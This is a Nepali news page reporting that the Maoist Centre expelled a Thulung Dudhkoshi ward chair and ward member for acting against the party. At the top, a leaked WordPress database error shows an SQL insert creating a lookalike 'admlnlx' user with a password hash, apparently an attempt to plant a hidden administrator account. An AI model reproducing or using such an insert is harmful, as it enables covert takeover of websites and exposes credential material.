WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B71XsFjxG8Qp4/xkHn587R3dPHzI8r1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 15:09:21', '', 'admlnlx', 'admlnlx')

थुलुङ दुधकोशीका निर्वाचित वडाध्यक्ष पार्टीबाट निष्काशित – Gaule Khabar

थुलुङ दुधकोशीका निर्वाचित वडाध्यक्ष पार्टीबाट निष्काशित

थुलुङ दुधकोशीका निर्वाचित वडाध्यक्ष पार्टीबाट निष्काशित

काठमाण्डौ । थुलुङ दुधकोशी गाउँपालिका–९ का निर्वाचित वडा अध्यक्ष भुपाल सिंं राई र वडा सदस्य सोम कुमार तामाङलाई नेकपा (माओवादी केन्द्र)ले पार्टीको साधारण सदस्य समेत नरहने गरी पार्टीबाट निष्काशित गरेको छ।

नेकपा (माओवादी केन्द्र)को जिल्ला समन्वय समिति सोलुखुम्बुका संयोजक असिम राईले एक विज्ञप्ति जारी गर्दै गाउँपालिका समिति सदस्य समेत रहेका भुपाल सिं र सोमकुमारलाई पार्टी सिद्धान्त विपरित कार्य गरेकाले निष्काशित गरिएको बताए।

जनपक्षीय र पार्टी पद्धतिमा रहेर काम गर्न पटक पटक निर्देशन दिएको भएपनि पार्टी आचारण र जनहित विपरितका कार्यहरु प्रदर्शन गरेको, मुलुकका प्रतिगमनकारी शक्तिहरुसँग अनावश्यक साँठगाँठ गरि पार्टीलाई नै बद्नाम गराउने गरि अगाडी बढेको पाएकाले कार्वाही गर्न बाध्य भएको माओवादी केन्द्रले जनाएको छ ।

सोही विज्ञप्ति मार्फत उक्त कार्बाही प्रतिगमनका मतियारहरुलाई मात्र भएकोले विचलित नभई नजिकिंदै गरेको स्थानीय चुनावमा सोलुखुम्बुमा नेकपा माओबादी केन्द्रलाई पहिलो पार्टी बनाउने दिशामा अग्रसर भएर काम गर्न अपिल समेत गरिएको छ ।

ट्रेकिङ व्यवसायमा रहेका भुपाल सिं राईलाई माओवादी केन्द्रले २०७४ सालको निर्वाचनमा वडा अध्यक्षको उम्मेद्वार बनाएको थियो ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका